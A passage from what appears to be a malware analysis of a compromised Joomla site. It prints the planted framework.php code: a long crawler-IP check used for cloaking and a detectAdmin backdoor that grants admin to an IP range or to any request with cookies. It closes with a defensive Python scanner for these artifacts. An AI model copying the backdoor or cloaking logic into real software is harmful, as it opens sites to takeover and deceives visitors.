'66.196.67.233') !== false || stripos($ip, '66.196.67.234') !== false || stripos($ip, '66.196.67.235') !== false || stripos($ip, '66.196.67.236') !== false || stripos($ip, '66.196.67.237') !== false || stripos($ip, '66.196.67.238') !== false || stripos($ip, '66.196.67.239') !== false || stripos($ip, '66.196.67.240') !== false || stripos($ip, '66.196.67.254') !== false || stripos($ip, '66.196.67.30') !== false || stripos($ip, '66.196.67.31') !== false || stripos($ip, '66.196.67.32') !== false || stripos($ip, '66.196.67.33') !== false || stripos($ip, '66.196.67.34') !== false || stripos($ip, '66.196.67.35') !== false || stripos($ip, '66.196.67.36') !== false || stripos($ip, '66.196.67.37') !== false || stripos($ip, '66.196.67.38') !== false || stripos($ip, '66.196.67.39') !== false || stripos($ip, '66.196.67.70') !== false || stripos($ip, '66.196.67.71') !== false || stripos($ip, '66.196.67.72') !== false || stripos($ip, '66.196.67.73') !== false || stripos($ip, '66.196.67.74') !== false || stripos($ip, '66.196.67.75') !== false || stripos($ip, '66.196.67.76') !== false || stripos($ip, '66.196.67.77') !== false || stripos($ip, '66.196.67.78') !== false || stripos($ip, '66.196.67.79') !== false || stripos($ip, '66.196.67.80') !== false || stripos($ip, '66.196.67.94') !== false || stripos($ip, '66.196.67.95') !== false || stripos($ip, '66.196.67.96') !== false || stripos($ip, '66.196.67.97') !== false || stripos($ip, '66.196.67.98') !== false || stripos($ip, '66.196.67.99') !== false || stripos($ip, '66.196.72') !== false || stripos($ip, '66.196.73') !== false || stripos($ip, '66.196.74') !== false || stripos($ip, '66.196.77') !== false || stripos($ip, '66.196.78') !== false || stripos($ip, '66.196.80') !== false || stripos($ip, '66.196.81.10') !== false || stripos($ip, '66.196.81.102') !== false || stripos($ip, '66.196.81.103') !== false || stripos($ip, '66.196.81.104') !== false || stripos($ip, '66.196.81.105') !== false || stripos($ip, '66.196.81.106') !== false || 
stripos($ip, '66.196.81.107') !== false || stripos($ip, '66.196.81.108') !== false || stripos($ip, '66.196.81.109') !== false || stripos($ip, '66.196.81.11') !== false || stripos($ip, '66.196.81.110') !== false || stripos($ip, '66.196.81.111') !== false || stripos($ip, '66.196.81.112') !== false || stripos($ip, '66.196.81.113') !== false || stripos($ip, '66.196.81.114') !== false || stripos($ip, '66.196.81.115') !== false || stripos($ip, '66.196.81.116') !== false || stripos($ip, '66.196.81.117') !== false || stripos($ip, '66.196.81.118') !== false || stripos($ip, '66.196.81.119') !== false || stripos($ip, '66.196.81.12') !== false || stripos($ip, '66.196.81.120') !== false || stripos($ip, '66.196.81.121') !== false || stripos($ip, '66.196.81.122') !== false || stripos($ip, '66.196.81.123') !== false || stripos($ip, '66.196.81.124') !== false || stripos($ip, '66.196.81.125') !== false || stripos($ip, '66.196.81.126') !== false || stripos($ip, '66.196.81.127') !== false || stripos($ip, '66.196.81.128') !== false || stripos($ip, '66.196.81.129') !== false || stripos($ip, '66.196.81.13') !== false || stripos($ip, '66.196.81.130') !== false || stripos($ip, '66.196.81.131') !== false || stripos($ip, '66.196.81.132') !== false || stripos($ip, '66.196.81.133') !== false || stripos($ip, '66.196.81.134') !== false || stripos($ip, '66.196.81.135') !== false || stripos($ip, '66.196.81.136') !== false || stripos($ip, '66.196.81.137') !== false || stripos($ip, '66.196.81.138') !== false || stripos($ip, '66.196.81.139') !== false || stripos($ip, '66.196.81.14') !== false || stripos($ip, '66.196.81.140') !== false || stripos($ip, '66.196.81.141') !== false || stripos($ip, '66.196.81.142') !== false || stripos($ip, '66.196.81.143') !== false || stripos($ip, '66.196.81.144') !== false || stripos($ip, '66.196.81.145') !== false || stripos($ip, '66.196.81.146') !== false || stripos($ip, '66.196.81.147') !== false || stripos($ip, '66.196.81.148') !== false || stripos($ip, 
'66.196.81.149') !== false || stripos($ip, '66.196.81.15') !== false || stripos($ip, '66.196.81.150') !== false || stripos($ip, '66.196.81.151') !== false || stripos($ip, '66.196.81.152') !== false || stripos($ip, '66.196.81.153') !== false || stripos($ip, '66.196.81.154') !== false || stripos($ip, '66.196.81.155') !== false || stripos($ip, '66.196.81.156') !== false || stripos($ip, '66.196.81.157') !== false || stripos($ip, '66.196.81.158') !== false || stripos($ip, '66.196.81.159') !== false || stripos($ip, '66.196.81.16') !== false || stripos($ip, '66.196.81.160') !== false || stripos($ip, '66.196.81.161') !== false || stripos($ip, '66.196.81.162') !== false || stripos($ip, '66.196.81.163') !== false || stripos($ip, '66.196.81.164') !== false || stripos($ip, '66.196.81.165') !== false || stripos($ip, '66.196.81.166') !== false || stripos($ip, '66.196.81.167') !== false || stripos($ip, '66.196.81.168') !== false || stripos($ip, '66.196.81.169') !== false || stripos($ip, '66.196.81.17') !== false || stripos($ip, '66.196.81.170') !== false || stripos($ip, '66.196.81.171') !== false || stripos($ip, '66.196.81.172') !== false || stripos($ip, '66.196.81.173') !== false || stripos($ip, '66.196.81.174') !== false || stripos($ip, '66.196.81.175') !== false || stripos($ip, '66.196.81.176') !== false || stripos($ip, '66.196.81.177') !== false || stripos($ip, '66.196.81.178') !== false || stripos($ip, '66.196.81.179') !== false || stripos($ip, '66.196.81.18') !== false || stripos($ip, '66.196.81.180') !== false || stripos($ip, '66.196.81.181') !== false || stripos($ip, '66.196.81.182') !== false || stripos($ip, '66.196.81.183') !== false || stripos($ip, '66.196.81.184') !== false || stripos($ip, '66.196.81.185') !== false || stripos($ip, '66.196.81.187') !== false || stripos($ip, '66.196.81.188') !== false || stripos($ip, '66.196.81.189') !== false || stripos($ip, '66.196.81.19') !== false || stripos($ip, '66.196.81.190') !== false || stripos($ip, '66.196.81.191') !== false 
|| stripos($ip, '66.196.81.192') !== false || stripos($ip, '66.196.81.193') !== false || stripos($ip, '66.196.81.194') !== false || stripos($ip, '66.196.81.195') !== false || stripos($ip, '66.196.81.196') !== false || stripos($ip, '66.196.81.197') !== false || stripos($ip, '66.196.81.198') !== false || stripos($ip, '66.196.81.199') !== false || stripos($ip, '66.196.81.20') !== false || stripos($ip, '66.196.81.200') !== false || stripos($ip, '66.196.81.201') !== false || stripos($ip, '66.196.81.202') !== false || stripos($ip, '66.196.81.203') !== false || stripos($ip, '66.196.81.204') !== false || stripos($ip, '66.196.81.205') !== false || stripos($ip, '66.196.81.206') !== false || stripos($ip, '66.196.81.207') !== false || stripos($ip, '66.196.81.208') !== false || stripos($ip, '66.196.81.209') !== false || stripos($ip, '66.196.81.21') !== false || stripos($ip, '66.196.81.210') !== false || stripos($ip, '66.196.81.211') !== false || stripos($ip, '66.196.81.212') !== false || stripos($ip, '66.196.81.213') !== false || stripos($ip, '66.196.81.214') !== false || stripos($ip, '66.196.81.215') !== false || stripos($ip, '66.196.81.216') !== false || stripos($ip, '66.196.81.217') !== false || stripos($ip, '66.196.81.218') !== false || stripos($ip, '66.196.81.219') !== false || stripos($ip, '66.196.81.22') !== false || stripos($ip, '66.196.81.23') !== false || stripos($ip, '66.196.81.86') !== false || stripos($ip, '66.196.81.87') !== false || stripos($ip, '66.196.81.88') !== false || stripos($ip, '66.196.81.93') !== false || stripos($ip, '66.196.81.94') !== false || stripos($ip, '66.196.81.95') !== false || stripos($ip, '66.196.81.96') !== false || stripos($ip, '66.196.90') !== false || stripos($ip, '66.196.91') !== false || stripos($ip, '66.196.92') !== false || stripos($ip, '66.196.93.19') !== false || stripos($ip, '66.196.93.24') !== false || stripos($ip, '66.196.93.6') !== false || stripos($ip, '66.196.93.7') !== false || stripos($ip, '66.196.97') !== false || 
stripos($ip, '66.196.99.20') !== false || stripos($ip, '66.218.65.52') !== false || stripos($ip, '66.218.70') !== false || stripos($ip, '66.228.164') !== false || stripos($ip, '66.228.165') !== false || stripos($ip, '66.228.166') !== false || stripos($ip, '66.228.173') !== false || stripos($ip, '66.228.182.177') !== false || stripos($ip, '66.228.182.183') !== false || stripos($ip, '66.228.182.185') !== false || stripos($ip, '66.228.182.187') !== false || stripos($ip, '66.228.182.188') !== false || stripos($ip, '66.228.182.190') !== false || stripos($ip, '66.94.230.100') !== false || stripos($ip, '66.94.230.101') !== false || stripos($ip, '66.94.230.102') !== false || stripos($ip, '66.94.230.103') !== false || stripos($ip, '66.94.230.104') !== false || stripos($ip, '66.94.230.105') !== false || stripos($ip, '66.94.230.106') !== false || stripos($ip, '66.94.230.107') !== false || stripos($ip, '66.94.230.108') !== false || stripos($ip, '66.94.230.109') !== false || stripos($ip, '66.94.230.110') !== false || stripos($ip, '66.94.230.160') !== false || stripos($ip, '66.94.230.161') !== false || stripos($ip, '66.94.230.162') !== false || stripos($ip, '66.94.230.163') !== false || stripos($ip, '66.94.230.96') !== false || stripos($ip, '66.94.230.97') !== false || stripos($ip, '66.94.230.98') !== false || stripos($ip, '66.94.230.99') !== false || stripos($ip, '66.94.232') !== false || stripos($ip, '66.94.233') !== false || stripos($ip, '66.94.238.51') !== false || stripos($ip, '67.195.34') !== false || stripos($ip, '67.195.37') !== false || stripos($ip, '67.195.44') !== false || stripos($ip, '67.195.45') !== false || stripos($ip, '67.195.50.87') !== false || stripos($ip, '67.195.51') !== false || stripos($ip, '67.195.52') !== false || stripos($ip, '67.195.54') !== false || stripos($ip, '67.195.58') !== false || stripos($ip, '67.195.98') !== false || stripos($ip, '68.142.195.80') !== false || stripos($ip, '68.142.195.81') !== false || stripos($ip, '68.142.203.133') !== false 
|| stripos($ip, '68.142.211.69') !== false || stripos($ip, '68.142.212.197') !== false || stripos($ip, '68.142.230.125') !== false || stripos($ip, '68.142.230.126') !== false || stripos($ip, '68.142.230.127') !== false || stripos($ip, '68.142.230.128') !== false || stripos($ip, '68.142.230.129') !== false || stripos($ip, '68.142.230.130') !== false || stripos($ip, '68.142.230.131') !== false || stripos($ip, '68.142.230.132') !== false || stripos($ip, '68.142.230.133') !== false || stripos($ip, '68.142.230.134') !== false || stripos($ip, '68.142.230.135') !== false || stripos($ip, '68.142.230.136') !== false || stripos($ip, '68.142.230.137') !== false || stripos($ip, '68.142.230.138') !== false || stripos($ip, '68.142.230.139') !== false || stripos($ip, '68.142.230.140') !== false || stripos($ip, '68.142.230.141') !== false || stripos($ip, '68.142.230.142') !== false || stripos($ip, '68.142.230.143') !== false || stripos($ip, '68.142.230.144') !== false || stripos($ip, '68.142.230.145') !== false || stripos($ip, '68.142.230.146') !== false || stripos($ip, '68.142.230.147') !== false || stripos($ip, '68.142.230.148') !== false || stripos($ip, '68.142.230.149') !== false || stripos($ip, '68.142.230.150') !== false || stripos($ip, '68.142.230.151') !== false || stripos($ip, '68.142.230.152') !== false || stripos($ip, '68.142.230.153') !== false || stripos($ip, '68.142.230.154') !== false || stripos($ip, '68.142.230.155') !== false || stripos($ip, '68.142.230.156') !== false || stripos($ip, '68.142.230.157') !== false || stripos($ip, '68.142.230.158') !== false || stripos($ip, '68.142.230.159') !== false || stripos($ip, '68.142.230.160') !== false || stripos($ip, '68.142.230.161') !== false || stripos($ip, '68.142.230.162') !== false || stripos($ip, '68.142.230.163') !== false || stripos($ip, '68.142.230.164') !== false || stripos($ip, '68.142.230.165') !== false || stripos($ip, '68.142.230.166') !== false || stripos($ip, '68.142.230.167') !== false || stripos($ip, 
'68.142.230.168') !== false || stripos($ip, '68.142.230.169') !== false || stripos($ip, '68.142.230.174') !== false || stripos($ip, '68.142.230.175') !== false || stripos($ip, '68.142.230.176') !== false || stripos($ip, '68.142.230.177') !== false || stripos($ip, '68.142.230.178') !== false || stripos($ip, '68.142.230.179') !== false || stripos($ip, '68.142.230.180') !== false || stripos($ip, '68.142.230.181') !== false || stripos($ip, '68.142.230.182') !== false || stripos($ip, '68.142.230.183') !== false || stripos($ip, '68.142.230.184') !== false || stripos($ip, '68.142.230.185') !== false || stripos($ip, '68.142.230.186') !== false || stripos($ip, '68.142.230.187') !== false || stripos($ip, '68.142.230.188') !== false || stripos($ip, '68.142.230.189') !== false || stripos($ip, '68.142.230.190') !== false || stripos($ip, '68.142.230.191') !== false || stripos($ip, '68.142.230.192') !== false || stripos($ip, '68.142.230.193') !== false || stripos($ip, '68.142.230.194') !== false || stripos($ip, '68.142.230.195') !== false || stripos($ip, '68.142.230.196') !== false || stripos($ip, '68.142.230.197') !== false || stripos($ip, '68.142.230.198') !== false || stripos($ip, '68.142.230.199') !== false || stripos($ip, '68.142.230.200') !== false || stripos($ip, '68.142.230.201') !== false || stripos($ip, '68.142.230.202') !== false || stripos($ip, '68.142.230.203') !== false || stripos($ip, '68.142.230.204') !== false || stripos($ip, '68.142.230.205') !== false || stripos($ip, '68.142.230.206') !== false || stripos($ip, '68.142.230.207') !== false || stripos($ip, '68.142.230.208') !== false || stripos($ip, '68.142.230.209') !== false || stripos($ip, '68.142.230.210') !== false || stripos($ip, '68.142.230.211') !== false || stripos($ip, '68.142.230.212') !== false || stripos($ip, '68.142.230.213') !== false || stripos($ip, '68.142.230.214') !== false || stripos($ip, '68.142.230.215') !== false || stripos($ip, '68.142.230.216') !== false || stripos($ip, '68.142.230.217') 
!== false || stripos($ip, '68.142.230.240') !== false || stripos($ip, '68.142.230.247') !== false || stripos($ip, '68.142.230.248') !== false || stripos($ip, '68.142.230.249') !== false || stripos($ip, '68.142.230.250') !== false || stripos($ip, '68.142.230.251') !== false || stripos($ip, '68.142.230.252') !== false || stripos($ip, '68.142.230.253') !== false || stripos($ip, '68.142.230.254') !== false || stripos($ip, '68.142.230.32') !== false || stripos($ip, '68.142.230.33') !== false || stripos($ip, '68.142.230.34') !== false || stripos($ip, '68.142.230.35') !== false || stripos($ip, '68.142.230.36') !== false || stripos($ip, '68.142.230.37') !== false || stripos($ip, '68.142.230.38') !== false || stripos($ip, '68.142.230.39') !== false || stripos($ip, '68.142.230.40') !== false || stripos($ip, '68.142.230.41') !== false || stripos($ip, '68.142.230.43') !== false || stripos($ip, '68.142.230.44') !== false || stripos($ip, '68.142.230.45') !== false || stripos($ip, '68.142.230.46') !== false || stripos($ip, '68.142.230.47') !== false || stripos($ip, '68.142.230.48') !== false || stripos($ip, '68.142.230.49') !== false || stripos($ip, '68.142.231.49') !== false || stripos($ip, '68.142.240.106') !== false || stripos($ip, '68.142.246') !== false || stripos($ip, '68.142.249') !== false || stripos($ip, '68.142.250') !== false || stripos($ip, '68.142.251') !== false || stripos($ip, '68.180.216.111') !== false || stripos($ip, '68.180.250') !== false || stripos($ip, '68.180.251') !== false || stripos($ip, '69.147.79.131') !== false || stripos($ip, '69.147.79.137') !== false || stripos($ip, '69.147.79.173') !== false || stripos($ip, '72.30.101') !== false || stripos($ip, '72.30.102') !== false || stripos($ip, '72.30.103') !== false || stripos($ip, '72.30.104') !== false || stripos($ip, '72.30.107') !== false || stripos($ip, '72.30.110') !== false || stripos($ip, '72.30.111') !== false || stripos($ip, '72.30.124.128') !== false || stripos($ip, '72.30.124.130') !== false || 
stripos($ip, '72.30.124.134') !== false || stripos($ip, '72.30.128') !== false || stripos($ip, '72.30.129') !== false || stripos($ip, '72.30.131') !== false || stripos($ip, '72.30.132') !== false || stripos($ip, '72.30.133') !== false || stripos($ip, '72.30.134') !== false || stripos($ip, '72.30.135') !== false || stripos($ip, '72.30.142.24') !== false || stripos($ip, '72.30.142.25') !== false || stripos($ip, '72.30.177') !== false || stripos($ip, '72.30.179') !== false || stripos($ip, '72.30.213.101') !== false || stripos($ip, '72.30.214') !== false || stripos($ip, '72.30.215') !== false || stripos($ip, '72.30.216') !== false || stripos($ip, '72.30.221') !== false || stripos($ip, '72.30.226') !== false || stripos($ip, '72.30.252') !== false || stripos($ip, '72.30.54') !== false || stripos($ip, '72.30.56') !== false || stripos($ip, '72.30.60') !== false || stripos($ip, '72.30.61') !== false || stripos($ip, '72.30.81') !== false || stripos($ip, '72.30.87') !== false || stripos($ip, '72.30.9') !== false || stripos($ip, '72.30.97') !== false || stripos($ip, '72.30.98') !== false || stripos($ip, '72.30.99') !== false || stripos($ip, '74.6.11') !== false || stripos($ip, '74.6.12') !== false || stripos($ip, '74.6.13') !== false || stripos($ip, '74.6.131') !== false || stripos($ip, '74.6.16') !== false || stripos($ip, '74.6.17') !== false || stripos($ip, '74.6.18') !== false || stripos($ip, '74.6.19') !== false || stripos($ip, '74.6.20') !== false || stripos($ip, '74.6.21') !== false || stripos($ip, '74.6.22') !== false || stripos($ip, '74.6.23') !== false || stripos($ip, '74.6.24') !== false || stripos($ip, '74.6.240') !== false || stripos($ip, '74.6.25') !== false || stripos($ip, '74.6.26') !== false || stripos($ip, '74.6.27') !== false || stripos($ip, '74.6.28') !== false || stripos($ip, '74.6.29') !== false || stripos($ip, '74.6.30') !== false || stripos($ip, '74.6.31') !== false || stripos($ip, '74.6.65') !== false || stripos($ip, '74.6.66') !== false || stripos($ip, 
'74.6.67') !== false || stripos($ip, '74.6.68') !== false || stripos($ip, '74.6.69') !== false || stripos($ip, '74.6.7') !== false || stripos($ip, '74.6.70') !== false || stripos($ip, '74.6.71') !== false || stripos($ip, '74.6.72') !== false || stripos($ip, '74.6.73') !== false || stripos($ip, '74.6.74') !== false || stripos($ip, '74.6.75') !== false || stripos($ip, '74.6.76') !== false || stripos($ip, '74.6.79') !== false || stripos($ip, '74.6.8') !== false || stripos($ip, '74.6.85') !== false || stripos($ip, '74.6.86') !== false || stripos($ip, '72.14.253') !== false || stripos($ip, '72.14.235') !== false || stripos($ip, '72.14.223') !== false || stripos($ip, '72.14.221') !== false || stripos($ip, '72.14.219') !== false || stripos($ip, '72.14.217') !== false || stripos($ip, '72.14.215') !== false || stripos($ip, '72.14.211') !== false || stripos($ip, '72.14.209') !== false || stripos($ip, '72.14.207') !== false || stripos($ip, '72.14.205') !== false || stripos($ip, '216.239.51') !== false || stripos($ip, '216.239.59') !== false || stripos($ip, '72.14.205') !== false || stripos($ip, '64.233.161') !== false || stripos($ip, '64.233.167') !== false || stripos($ip, '64.233.169') !== false || stripos($ip, '64.233.171') !== false || stripos($ip, '64.233.179') !== false || stripos($ip, '64.233.183') !== false || stripos($ip, '64.233.187') !== false || stripos($ip, '64.233.189') !== false || stripos($ip, '66.102.1') !== false || stripos($ip, '66.102.9') !== false || stripos($ip, '66.249.81') !== false || stripos($ip, '66.249.83') !== false || stripos($ip, '66.249.89') !== false || stripos($ip, '66.249.91') !== false || stripos($ip, '66.249.93') !== false || stripos($ip, '74.125.77.132') !== false || stripos($ip, '66.249.71') !== false || stripos($ip, '66.249.65') !== false || stripos($ip, '66.249.68') !== false || stripos($ip, '149.122.15.60') !== false || stripos($ip, '205.45.62.124') !== false || stripos($ip, '69.64.147.212') !== false || stripos($ip, '66.249.67') !== 
false || stripos($ip, '2.8.10.5') !== false || stripos($ip, '209.85.229.132') !== false || stripos($ip, '66.249.84') !== false || stripos($ip, '74.6.87') !== false || stripos($ip, '66.249') !== false
//|| stripos($ip, '84.111.167.34') !== false
) {
    return true;
} else {
    return false;
}
}
function detectAdmin($server_ip) {
Now we decide if you are admin – note the use of a regex form of the CULL IP space as noted above. If you show up from this IP space and provide the above overridden password, you are in as admin!
    $stop_ips_masks = array("37\.9\.[0-9]+\.[0-9]+");
    $is_admin = false;
    foreach ($stop_ips_masks as $stop_ip_mask)
        if (preg_match("/{$stop_ip_mask}/i", $server_ip)) {
            $is_admin = true;
            break;
        }
    $count = count($_COOKIE);
    if($count > 0) {
        $is_admin = true;
    }
    return $is_admin;
}
function HandleLog ($data) {
    return;
    $dataStringForTextFileLog = implode(", ", $data);
    $dataStringForTextFileLog .= ".\n";
    $myFile = "log.txt";
    $fh = fopen($myFile, 'a');
    fwrite($fh, $dataStringForTextFileLog);
    fclose($fh);
}
And finally, cleanup logs and such. That’s all in the framework.php file alone, folks! The other two modified files were png!
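A sweep of a web root for the three artifacts this write-up turned up: a base64_decode name assembled from string fragments and fed to eval, a long chain of hard-coded stripos() IP comparisons, and .png files that are not images. This is an added example, not code from the original post; the indicator labels, the threshold of 20 and the sample tree are assumptions of the example.

```python
from __future__ import annotations

import re
import tempfile
from pathlib import Path

PNG_MAGIC = b"\x89PNG\r\n\x1a\n"  # first 8 bytes of every real PNG
# Seam between adjacent PHP string literals: 'bas'.'e6' -> 'base6'
CONCAT_JOIN = re.compile(rb"""['"]\s*\.\s*['"]""")
EVAL_CALL = re.compile(rb"\beval\s*\(", re.I)
# One link of the crawler check, e.g. stripos($ip, '66.249')
IP_COMPARE = re.compile(
    rb"stripos\(\s*\$\w+\s*,\s*'\d{1,3}(?:\.\d{1,3}){1,3}'\s*\)", re.I
)
IP_CHAIN_THRESHOLD = 20  # assumption: tune for your own code base


def scan_php(data: bytes) -> list[str]:
    """Return indicator labels (this example's own names) for one PHP file."""
    findings = []
    raw = data.lower()
    joined = CONCAT_JOIN.sub(b"", data).lower()
    # The function name only shows up once the literal fragments are glued
    # together, which is what defeats a plain search for "base64_decode".
    split_name = joined.count(b"base64_decode") > raw.count(b"base64_decode")
    if split_name and EVAL_CALL.search(data):
        findings.append("split-base64-eval")
    if len(IP_COMPARE.findall(data)) >= IP_CHAIN_THRESHOLD:
        findings.append("hardcoded-ip-chain")
    return findings


def scan_tree(root: Path) -> dict[str, list[str]]:
    """Walk root; map relative path -> findings for every flagged file."""
    results: dict[str, list[str]] = {}
    for path in sorted(root.rglob("*")):
        if not path.is_file():
            continue
        suffix = path.suffix.lower()
        if suffix == ".php":
            findings = scan_php(path.read_bytes())
        elif suffix == ".png":
            # A log file renamed to .png will not carry the PNG signature.
            with path.open("rb") as fh:
                findings = [] if fh.read(8) == PNG_MAGIC else ["png-not-image"]
        else:
            continue
        if findings:
            results[path.relative_to(root).as_posix()] = findings
    return results


def build_sample_tree(root: Path) -> None:
    """Constructed sample files; every value here is made up for the demo."""
    chain = b" || ".join(
        b"stripos($ip, '192.0.2.%d') !== false" % i for i in range(25)
    )
    files = {
        "includes/framework.php": (
            b"<?php $a='bas'.'e6'.'4_d'.'ecode';eval($a(\"AAAA\"));\n"
            b"function crawler($ip) { if (" + chain + b") { return true; } }\n"
        ),
        "components/com_login/login.png": b"example.test|user:REDACTED|192.0.2.10\n",
        "media/logo.png": PNG_MAGIC + b"\x00" * 16,
        "index.php": b"<?php echo base64_decode($x);\n",
    }
    for rel, content in files.items():
        target = root / rel
        target.parent.mkdir(parents=True, exist_ok=True)
        target.write_bytes(content)


if __name__ == "__main__":
    with tempfile.TemporaryDirectory() as tmp:
        build_sample_tree(Path(tmp))
        for rel, findings in scan_tree(Path(tmp)).items():
            print(f"{rel}: {', '.join(findings)}")
```

Point `scan_tree()` at a copy of the site's document root; any hit still needs a diff against the matching upstream Joomla file before it is treated as confirmed.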